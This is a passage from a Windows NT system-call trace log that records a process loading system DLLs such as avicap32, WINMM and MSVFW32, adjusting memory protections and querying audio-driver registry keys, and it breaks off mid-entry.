NtAllocateVirtualMemory (-1, 15728640, 0, 4096, 4096, 4, ... 15728640, 4096, ) == 0x0 03215 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 03216 896 NtAllocateVirtualMemory (-1, 0, 0, 262144, 8192, 4, ... 15990784, 262144, ) == 0x0 03217 896 NtAllocateVirtualMemory (-1, 15990784, 0, 4096, 4096, 4, ... 15990784, 4096, ) == 0x0 03218 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 03219 896 NtQuerySystemInformation (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0 03220 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 03221 896 NtQuerySystemInformation (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0 03222 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\odbcint.dll"}, 1236144, ... ) }, 1236144, ... ) == 0x0 03223 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\odbcint.dll"}, 5, 96, ... 316, {status=0x0, info=1}, ) }, 5, 96, ... 316, {status=0x0, info=1}, ) == 0x0 03224 896 NtCreateSection (0xe, 0x0, 0x0, 16, 134217728, 316, ... 312, ) == 0x0 03225 896 NtClose (316, ... ) == 0x0 03226 896 NtMapViewOfSection (312, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0xdc0000), 0x0, 94208, ) == 0x0 03227 896 NtClose (312, ... ) == 0x0 03228 896 NtUnmapViewOfSection (-1, 0xdc0000, ... ) == 0x0 03229 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\odbcint.dll"}, 1236452, ... ) }, 1236452, ... ) == 0x0 03230 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\odbcint.dll"}, 5, 96, ... 312, {status=0x0, info=1}, ) }, 5, 96, ... 312, {status=0x0, info=1}, ) == 0x0 03231 896 NtCreateSection (0xf, 0x0, 0x0, 16, 16777216, 312, ... 316, ) == 0x0 03232 896 NtQuerySection (316, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0 03233 896 NtClose (312, ... ) == 0x0 03234 896 NtMapViewOfSection (316, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x20000000), 0x0, 94208, ) == 0x0 03235 896 NtClose (316, ... ) == 0x0 03236 896 NtQueryDefaultLocale (1, 1238284, ... ) == 0x0 03237 896 NtAllocateVirtualMemory (-1, 14159872, 0, 4096, 4096, 4, ... 14159872, 4096, ) == 0x0 03238 896 NtOpenKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, "SOFTWARE"}, ... 316, ) }, ... 316, ) == 0x0 03239 896 NtClose (316, ... ) == 0x0 03240 896 NtOpenKey (0x20019, {24, 120, 0x40, 0, 0, (0x20019, {24, 120, 0x40, 0, 0, "SOFTWARE\ODBC\ODBC.INI\ODBC"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03241 896 NtOpenKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, "SOFTWARE\ODBC\ODBC.INI\ODBC"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03242 896 NtOpenKey (0x20019, {24, 120, 0x40, 0, 0, (0x20019, {24, 120, 0x40, 0, 0, "SOFTWARE\ODBC\ODBC.INI\ODBC"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03243 896 NtOpenKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, "SOFTWARE\ODBC\ODBC.INI\ODBC"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03244 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\odbcint.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03245 896 NtProtectVirtualMemory (-1, (0x5d0911a4), 4, 4, ... (0x5d091000), 4096, 32, ) == 0x0 03246 896 NtProtectVirtualMemory (-1, (0x5d0911a4), 4, 32, ... (0x5d091000), 4096, 4, ) == 0x0 03247 896 NtProtectVirtualMemory (-1, (0x5d0911a8), 4, 4, ... (0x5d091000), 4096, 32, ) == 0x0 03248 896 NtProtectVirtualMemory (-1, (0x5d0911a8), 4, 32, ... (0x5d091000), 4096, 4, ) == 0x0 03249 896 NtProtectVirtualMemory (-1, (0x5d0911ac), 4, 4, ... (0x5d091000), 4096, 32, ) == 0x0 03250 896 NtProtectVirtualMemory (-1, (0x5d0911ac), 4, 32, ... (0x5d091000), 4096, 4, ) == 0x0 03251 896 NtProtectVirtualMemory (-1, (0x5d0911b0), 4, 4, ... (0x5d091000), 4096, 32, ) == 0x0 03252 896 NtProtectVirtualMemory (-1, (0x5d0911b0), 4, 32, ... (0x5d091000), 4096, 4, ) == 0x0 03253 896 NtProtectVirtualMemory (-1, (0x5d0911e4), 4, 4, ... (0x5d091000), 4096, 32, ) == 0x0 03254 896 NtProtectVirtualMemory (-1, (0x5d0911e4), 4, 32, ... (0x5d091000), 4096, 4, ) == 0x0 03255 896 NtProtectVirtualMemory (-1, (0x5d0912bc), 4, 4, ... (0x5d091000), 4096, 32, ) == 0x0 03256 896 NtProtectVirtualMemory (-1, (0x5d0912bc), 4, 32, ... (0x5d091000), 4096, 4, ) == 0x0 03257 896 NtProtectVirtualMemory (-1, (0x5d0912c0), 4, 4, ... (0x5d091000), 4096, 32, ) == 0x0 03258 896 NtProtectVirtualMemory (-1, (0x5d0912c0), 4, 32, ... (0x5d091000), 4096, 4, ) == 0x0 03259 896 NtProtectVirtualMemory (-1, (0x5d0912c4), 4, 4, ... (0x5d091000), 4096, 32, ) == 0x0 03260 896 NtProtectVirtualMemory (-1, (0x5d0912c4), 4, 32, ... (0x5d091000), 4096, 4, ) == 0x0 03261 896 NtProtectVirtualMemory (-1, (0x5d0912c8), 4, 4, ... (0x5d091000), 4096, 32, ) == 0x0 03262 896 NtProtectVirtualMemory (-1, (0x5d0912c8), 4, 32, ... (0x5d091000), 4096, 4, ) == 0x0 03263 896 NtProtectVirtualMemory (-1, (0x5d0912cc), 4, 4, ... (0x5d091000), 4096, 32, ) == 0x0 03264 896 NtProtectVirtualMemory (-1, (0x5d0912cc), 4, 32, ... (0x5d091000), 4096, 4, ) == 0x0 03265 896 NtProtectVirtualMemory (-1, (0x5d0912d4), 4, 4, ... (0x5d091000), 4096, 32, ) == 0x0 03266 896 NtProtectVirtualMemory (-1, (0x5d0912d4), 4, 32, ... (0x5d091000), 4096, 4, ) == 0x0 03267 896 NtProtectVirtualMemory (-1, (0x5d0912e0), 4, 4, ... (0x5d091000), 4096, 32, ) == 0x0 03268 896 NtProtectVirtualMemory (-1, (0x5d0912e0), 4, 32, ... (0x5d091000), 4096, 4, ) == 0x0 03269 896 NtProtectVirtualMemory (-1, (0x5d091304), 4, 4, ... (0x5d091000), 4096, 32, ) == 0x0 03270 896 NtProtectVirtualMemory (-1, (0x5d091304), 4, 32, ... (0x5d091000), 4096, 4, ) == 0x0 03271 896 NtProtectVirtualMemory (-1, (0x5d091338), 4, 4, ... (0x5d091000), 4096, 32, ) == 0x0 03272 896 NtProtectVirtualMemory (-1, (0x5d091338), 4, 32, ... (0x5d091000), 4096, 4, ) == 0x0 03273 896 NtProtectVirtualMemory (-1, (0x5d09133c), 4, 4, ... (0x5d091000), 4096, 32, ) == 0x0 03274 896 NtProtectVirtualMemory (-1, (0x5d09133c), 4, 32, ... (0x5d091000), 4096, 4, ) == 0x0 03275 896 NtProtectVirtualMemory (-1, (0x5d091344), 4, 4, ... (0x5d091000), 4096, 32, ) == 0x0 03276 896 NtProtectVirtualMemory (-1, (0x5d091344), 4, 32, ... (0x5d091000), 4096, 4, ) == 0x0 03277 896 NtProtectVirtualMemory (-1, (0x5d09136c), 4, 4, ... (0x5d091000), 4096, 32, ) == 0x0 03278 896 NtProtectVirtualMemory (-1, (0x5d09136c), 4, 32, ... (0x5d091000), 4096, 4, ) == 0x0 03279 896 NtProtectVirtualMemory (-1, (0x743210bc), 4, 4, ... (0x74321000), 4096, 32, ) == 0x0 03280 896 NtProtectVirtualMemory (-1, (0x743210bc), 4, 32, ... (0x74321000), 4096, 4, ) == 0x0 03281 896 NtProtectVirtualMemory (-1, (0x743210e8), 4, 4, ... (0x74321000), 4096, 32, ) == 0x0 03282 896 NtProtectVirtualMemory (-1, (0x743210e8), 4, 32, ... (0x74321000), 4096, 4, ) == 0x0 03283 896 NtProtectVirtualMemory (-1, (0x743210ec), 4, 4, ... (0x74321000), 4096, 32, ) == 0x0 03284 896 NtProtectVirtualMemory (-1, (0x743210ec), 4, 32, ... (0x74321000), 4096, 4, ) == 0x0 03285 896 NtProtectVirtualMemory (-1, (0x743210f0), 4, 4, ... (0x74321000), 4096, 32, ) == 0x0 03286 896 NtProtectVirtualMemory (-1, (0x743210f0), 4, 32, ... (0x74321000), 4096, 4, ) == 0x0 03287 896 NtProtectVirtualMemory (-1, (0x743210f4), 4, 4, ... (0x74321000), 4096, 32, ) == 0x0 03288 896 NtProtectVirtualMemory (-1, (0x743210f4), 4, 32, ... (0x74321000), 4096, 4, ) == 0x0 03289 896 NtProtectVirtualMemory (-1, (0x743210f8), 4, 4, ... (0x74321000), 4096, 32, ) == 0x0 03290 896 NtProtectVirtualMemory (-1, (0x743210f8), 4, 32, ... (0x74321000), 4096, 4, ) == 0x0 03291 896 NtProtectVirtualMemory (-1, (0x743210fc), 4, 4, ... (0x74321000), 4096, 32, ) == 0x0 03292 896 NtProtectVirtualMemory (-1, (0x743210fc), 4, 32, ... (0x74321000), 4096, 4, ) == 0x0 03293 896 NtProtectVirtualMemory (-1, (0x7432110c), 4, 4, ... (0x74321000), 4096, 32, ) == 0x0 03294 896 NtProtectVirtualMemory (-1, (0x7432110c), 4, 32, ... (0x74321000), 4096, 4, ) == 0x0 03295 896 NtProtectVirtualMemory (-1, (0x74321110), 4, 4, ... (0x74321000), 4096, 32, ) == 0x0 03296 896 NtProtectVirtualMemory (-1, (0x74321110), 4, 32, ... (0x74321000), 4096, 4, ) == 0x0 03297 896 NtProtectVirtualMemory (-1, (0x74321144), 4, 4, ... (0x74321000), 4096, 32, ) == 0x0 03298 896 NtProtectVirtualMemory (-1, (0x74321144), 4, 32, ... (0x74321000), 4096, 4, ) == 0x0 03299 896 NtProtectVirtualMemory (-1, (0x74321148), 4, 4, ... (0x74321000), 4096, 32, ) == 0x0 03300 896 NtProtectVirtualMemory (-1, (0x74321148), 4, 32, ... (0x74321000), 4096, 4, ) == 0x0 03301 896 NtProtectVirtualMemory (-1, (0x7432114c), 4, 4, ... (0x74321000), 4096, 32, ) == 0x0 03302 896 NtProtectVirtualMemory (-1, (0x7432114c), 4, 32, ... (0x74321000), 4096, 4, ) == 0x0 03303 896 NtProtectVirtualMemory (-1, (0x74321158), 4, 4, ... (0x74321000), 4096, 32, ) == 0x0 03304 896 NtProtectVirtualMemory (-1, (0x74321158), 4, 32, ... (0x74321000), 4096, 4, ) == 0x0 03305 896 NtProtectVirtualMemory (-1, (0x7432118c), 4, 4, ... (0x74321000), 4096, 32, ) == 0x0 03306 896 NtProtectVirtualMemory (-1, (0x7432118c), 4, 32, ... (0x74321000), 4096, 4, ) == 0x0 03307 896 NtProtectVirtualMemory (-1, (0x74321198), 4, 4, ... (0x74321000), 4096, 32, ) == 0x0 03308 896 NtProtectVirtualMemory (-1, (0x74321198), 4, 32, ... (0x74321000), 4096, 4, ) == 0x0 03309 896 NtProtectVirtualMemory (-1, (0x743211a4), 4, 4, ... (0x74321000), 4096, 32, ) == 0x0 03310 896 NtProtectVirtualMemory (-1, (0x743211a4), 4, 32, ... (0x74321000), 4096, 4, ) == 0x0 03311 896 NtProtectVirtualMemory (-1, (0x743211b0), 4, 4, ... (0x74321000), 4096, 32, ) == 0x0 03312 896 NtProtectVirtualMemory (-1, (0x743211b0), 4, 32, ... (0x74321000), 4096, 4, ) == 0x0 03313 896 NtProtectVirtualMemory (-1, (0x743211f0), 4, 4, ... (0x74321000), 4096, 32, ) == 0x0 03314 896 NtProtectVirtualMemory (-1, (0x743211f0), 4, 32, ... (0x74321000), 4096, 4, ) == 0x0 03315 896 NtProtectVirtualMemory (-1, (0x763b10a8), 4, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03316 896 NtProtectVirtualMemory (-1, (0x763b10a8), 4, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03317 896 NtProtectVirtualMemory (-1, (0x763b10ac), 4, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03318 896 NtProtectVirtualMemory (-1, (0x763b10ac), 4, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03319 896 NtProtectVirtualMemory (-1, (0x763b10fc), 4, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03320 896 NtProtectVirtualMemory (-1, (0x763b10fc), 4, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03321 896 NtProtectVirtualMemory (-1, (0x763b1104), 4, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03322 896 NtProtectVirtualMemory (-1, (0x763b1104), 4, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03323 896 NtProtectVirtualMemory (-1, (0x763b1128), 4, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03324 896 NtProtectVirtualMemory (-1, (0x763b1128), 4, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03325 896 NtProtectVirtualMemory (-1, (0x763b1154), 4, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03326 896 NtProtectVirtualMemory (-1, (0x763b1154), 4, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03327 896 NtProtectVirtualMemory (-1, (0x763b1158), 4, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03328 896 NtProtectVirtualMemory (-1, (0x763b1158), 4, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03329 896 NtProtectVirtualMemory (-1, (0x763b1174), 4, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03330 896 NtProtectVirtualMemory (-1, (0x763b1174), 4, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03331 896 NtProtectVirtualMemory (-1, (0x763b118c), 4, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03332 896 NtProtectVirtualMemory (-1, (0x763b118c), 4, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03333 896 NtProtectVirtualMemory (-1, (0x763b1190), 4, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03334 896 NtProtectVirtualMemory (-1, (0x763b1190), 4, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03335 896 NtProtectVirtualMemory (-1, (0x763b1194), 4, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03336 896 NtProtectVirtualMemory (-1, (0x763b1194), 4, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03337 896 NtProtectVirtualMemory (-1, (0x763b11a8), 4, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03338 896 NtProtectVirtualMemory (-1, (0x763b11a8), 4, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03339 896 NtProtectVirtualMemory (-1, (0x763b11ec), 4, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03340 896 NtProtectVirtualMemory (-1, (0x763b11ec), 4, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03341 896 NtProtectVirtualMemory (-1, (0x763b11fc), 4, 4, ... (0x763b1000), 4096, 32, ) == 0x0 03342 896 NtProtectVirtualMemory (-1, (0x763b11fc), 4, 32, ... (0x763b1000), 4096, 4, ) == 0x0 03343 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "avicap32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03344 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\u:\work\avicap32.dll"}, 1239772, ... ) }, 1239772, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03345 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\avicap32.dll"}, 1239772, ... ) }, 1239772, ... ) == 0x0 03346 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\avicap32.dll"}, 5, 96, ... 316, {status=0x0, info=1}, ) }, 5, 96, ... 316, {status=0x0, info=1}, ) == 0x0 03347 896 NtCreateSection (0xf, 0x0, 0x0, 16, 16777216, 316, ... 312, ) == 0x0 03348 896 NtQuerySection (312, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0 03349 896 NtClose (316, ... ) == 0x0 03350 896 NtMapViewOfSection (312, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x73b80000), 0x0, 73728, ) == 0x0 03351 896 NtClose (312, ... ) == 0x0 03352 896 NtProtectVirtualMemory (-1, (0x73b81000), 732, 4, ... (0x73b81000), 4096, 32, ) == 0x0 03353 896 NtProtectVirtualMemory (-1, (0x73b81000), 4096, 32, ... (0x73b81000), 4096, 4, ) == 0x0 03354 896 NtFlushInstructionCache (-1, 1941442560, 732, ... ) == 0x0 03355 896 NtProtectVirtualMemory (-1, (0x73b81000), 732, 4, ... (0x73b81000), 4096, 32, ) == 0x0 03356 896 NtProtectVirtualMemory (-1, (0x73b81000), 4096, 32, ... (0x73b81000), 4096, 4, ) == 0x0 03357 896 NtFlushInstructionCache (-1, 1941442560, 732, ... ) == 0x0 03358 896 NtProtectVirtualMemory (-1, (0x73b81000), 732, 4, ... (0x73b81000), 4096, 32, ) == 0x0 03359 896 NtProtectVirtualMemory (-1, (0x73b81000), 4096, 32, ... (0x73b81000), 4096, 4, ) == 0x0 03360 896 NtFlushInstructionCache (-1, 1941442560, 732, ... ) == 0x0 03361 896 NtProtectVirtualMemory (-1, (0x73b81000), 732, 4, ... (0x73b81000), 4096, 32, ) == 0x0 03362 896 NtProtectVirtualMemory (-1, (0x73b81000), 4096, 32, ... (0x73b81000), 4096, 4, ) == 0x0 03363 896 NtFlushInstructionCache (-1, 1941442560, 732, ... ) == 0x0 03364 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "WINMM.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03365 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\u:\work\WINMM.dll"}, 1238956, ... ) }, 1238956, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03366 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\WINMM.dll"}, 1238956, ... ) }, 1238956, ... ) == 0x0 03367 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\WINMM.dll"}, 5, 96, ... 312, {status=0x0, info=1}, ) }, 5, 96, ... 312, {status=0x0, info=1}, ) == 0x0 03368 896 NtCreateSection (0xf, 0x0, 0x0, 16, 16777216, 312, ... 316, ) == 0x0 03369 896 NtQuerySection (316, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0 03370 896 NtClose (312, ... ) == 0x0 03371 896 NtMapViewOfSection (316, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x76b40000), 0x0, 184320, ) == 0x0 03372 896 NtClose (316, ... ) == 0x0 03373 896 NtProtectVirtualMemory (-1, (0x76b41000), 860, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03374 896 NtProtectVirtualMemory (-1, (0x76b41000), 4096, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03375 896 NtFlushInstructionCache (-1, 1991512064, 860, ... ) == 0x0 03376 896 NtProtectVirtualMemory (-1, (0x76b41000), 860, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03377 896 NtProtectVirtualMemory (-1, (0x76b41000), 4096, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03378 896 NtFlushInstructionCache (-1, 1991512064, 860, ... ) == 0x0 03379 896 NtProtectVirtualMemory (-1, (0x76b41000), 860, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03380 896 NtProtectVirtualMemory (-1, (0x76b41000), 4096, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03381 896 NtFlushInstructionCache (-1, 1991512064, 860, ... ) == 0x0 03382 896 NtProtectVirtualMemory (-1, (0x76b41000), 860, 4, ... (0x76b41000), 4096, 32, ) == 0x0 03383 896 NtProtectVirtualMemory (-1, (0x76b41000), 4096, 32, ... (0x76b41000), 4096, 4, ) == 0x0 03384 896 NtFlushInstructionCache (-1, 1991512064, 860, ... ) == 0x0 03385 896 NtProtectVirtualMemory (-1, (0x73b81000), 732, 4, ... (0x73b81000), 4096, 32, ) == 0x0 03386 896 NtProtectVirtualMemory (-1, (0x73b81000), 4096, 32, ... (0x73b81000), 4096, 4, ) == 0x0 03387 896 NtFlushInstructionCache (-1, 1941442560, 732, ... ) == 0x0 03388 896 NtProtectVirtualMemory (-1, (0x73b81000), 732, 4, ... (0x73b81000), 4096, 32, ) == 0x0 03389 896 NtProtectVirtualMemory (-1, (0x73b81000), 4096, 32, ... (0x73b81000), 4096, 4, ) == 0x0 03390 896 NtFlushInstructionCache (-1, 1941442560, 732, ... ) == 0x0 03391 896 NtProtectVirtualMemory (-1, (0x73b81000), 732, 4, ... (0x73b81000), 4096, 32, ) == 0x0 03392 896 NtProtectVirtualMemory (-1, (0x73b81000), 4096, 32, ... (0x73b81000), 4096, 4, ) == 0x0 03393 896 NtFlushInstructionCache (-1, 1941442560, 732, ... ) == 0x0 03394 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "MSVFW32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03395 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\u:\work\MSVFW32.dll"}, 1238956, ... ) }, 1238956, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03396 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\MSVFW32.dll"}, 1238956, ... ) }, 1238956, ... ) == 0x0 03397 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\MSVFW32.dll"}, 5, 96, ... 316, {status=0x0, info=1}, ) }, 5, 96, ... 316, {status=0x0, info=1}, ) == 0x0 03398 896 NtCreateSection (0xf, 0x0, 0x0, 16, 16777216, 316, ... 312, ) == 0x0 03399 896 NtQuerySection (312, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0 03400 896 NtClose (316, ... ) == 0x0 03401 896 NtMapViewOfSection (312, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x75a70000), 0x0, 135168, ) == 0x0 03402 896 NtClose (312, ... ) == 0x0 03403 896 NtProtectVirtualMemory (-1, (0x75a71000), 1008, 4, ... (0x75a71000), 4096, 32, ) == 0x0 03404 896 NtProtectVirtualMemory (-1, (0x75a71000), 4096, 32, ... (0x75a71000), 4096, 4, ) == 0x0 03405 896 NtFlushInstructionCache (-1, 1973882880, 1008, ... ) == 0x0 03406 896 NtProtectVirtualMemory (-1, (0x75a71000), 1008, 4, ... (0x75a71000), 4096, 32, ) == 0x0 03407 896 NtProtectVirtualMemory (-1, (0x75a71000), 4096, 32, ... (0x75a71000), 4096, 4, ) == 0x0 03408 896 NtFlushInstructionCache (-1, 1973882880, 1008, ... ) == 0x0 03409 896 NtProtectVirtualMemory (-1, (0x75a71000), 1008, 4, ... (0x75a71000), 4096, 32, ) == 0x0 03410 896 NtProtectVirtualMemory (-1, (0x75a71000), 4096, 32, ... (0x75a71000), 4096, 4, ) == 0x0 03411 896 NtFlushInstructionCache (-1, 1973882880, 1008, ... ) == 0x0 03412 896 NtProtectVirtualMemory (-1, (0x75a71000), 1008, 4, ... (0x75a71000), 4096, 32, ) == 0x0 03413 896 NtProtectVirtualMemory (-1, (0x75a71000), 4096, 32, ... (0x75a71000), 4096, 4, ) == 0x0 03414 896 NtFlushInstructionCache (-1, 1973882880, 1008, ... ) == 0x0 03415 896 NtProtectVirtualMemory (-1, (0x75a71000), 1008, 4, ... (0x75a71000), 4096, 32, ) == 0x0 03416 896 NtProtectVirtualMemory (-1, (0x75a71000), 4096, 32, ... (0x75a71000), 4096, 4, ) == 0x0 03417 896 NtFlushInstructionCache (-1, 1973882880, 1008, ... ) == 0x0 03418 896 NtProtectVirtualMemory (-1, (0x73b81000), 732, 4, ... (0x73b81000), 4096, 32, ) == 0x0 03419 896 NtProtectVirtualMemory (-1, (0x73b81000), 4096, 32, ... (0x73b81000), 4096, 4, ) == 0x0 03420 896 NtFlushInstructionCache (-1, 1941442560, 732, ... ) == 0x0 03421 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WINMM.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03422 896 NtCreateEvent (0x1f0003, 0x0, 0, 0, ... 312, ) == 0x0 03423 896 NtCreateSemaphore (0x100003, 0x0, 0, 2147483647, ... 316, ) == 0x0 03424 896 NtCreateSemaphore (0x100003, 0x0, 0, 2147483647, ... 320, ) == 0x0 03425 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\DRIVERS32"}, ... 324, ) }, ... 324, ) == 0x0 03426 896 NtQueryValueKey (324, (324, "wave", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (324, "wave", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0 03427 896 NtAllocateVirtualMemory (-1, 0, 0, 524280, 8192, 4, ... 16252928, 524288, ) == 0x0 03428 896 NtAllocateVirtualMemory (-1, 16252928, 0, 4096, 4096, 4, ... 16252928, 4096, ) == 0x0 03429 896 NtQueryValueKey (324, (324, "wave", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (324, "wave", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0 03430 896 NtQueryValueKey (324, (324, "wave1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (324, "wave1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0 03431 896 NtQueryValueKey (324, (324, "wave1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) , Partial, 536, ... TitleIdx=0, Type=1, Data= (324, "wave1", Partial, 536, ... TitleIdx=0, Type=1, Data="w\0d\0m\0a\0u\0d\0.\0d\0r\0v\0\0\0"}, 34, ) }, 34, ) == 0x0 03432 896 NtQueryValueKey (324, (324, "wave2", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03433 896 NtQueryValueKey (324, (324, "wave3", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03434 896 NtQueryValueKey (324, (324, "wave4", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03435 896 NtQueryValueKey (324, (324, "wave5", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03436 896 NtQueryValueKey (324, (324, "wave6", 